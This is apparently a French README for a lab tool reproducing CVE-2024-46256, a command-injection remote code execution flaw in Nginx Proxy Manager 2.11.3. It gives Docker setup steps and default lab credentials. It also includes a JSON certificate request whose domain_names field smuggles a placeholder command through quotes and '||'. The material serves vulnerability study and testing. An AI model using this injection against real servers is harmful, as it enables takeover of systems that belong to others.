
CVE-2024-46256 outil
docker-compose up -d
Ou vous pouvez utiliser le script automatique :
python setup_environment.py
URL : http://localhost:81
Effectuez les tests après avoir terminé la configuration initiale
Connectez-vous avec le compte administrateur par défaut (email : [email protected] / mot de passe : changeme)
Vérifiez les droits d'accès aux fonctionnalités liées à l'émission de certificats
CVE ID : CVE-2024-46256
Produit : Nginx Proxy Manager
Version : 2.11.3
Type de vulnérabilité : Exécution de code à distance (RCE)
CVSS : Élevé
Le PoC permet à un utilisateur authentifié de provoquer une RCE en injectant des modèles/commandes dans le champ du nom de domaine lors de la demande d'émission d'un certificat (par exemple, Let's Encrypt).
Exemple de payload (exemple conceptuel) :
{
"domain_names": ["test.com\"||{command}||\\n test.com\""],
"meta": {
"dns_challenge": false,
"letsencrypt_agree": true,
"letsencrypt_email": "[email protected]"
},
"provider": "letsencrypt"
}
Système d'exploitation : Windows 10
Docker : version la plus récente
Nginx Proxy Manager : 2.11.3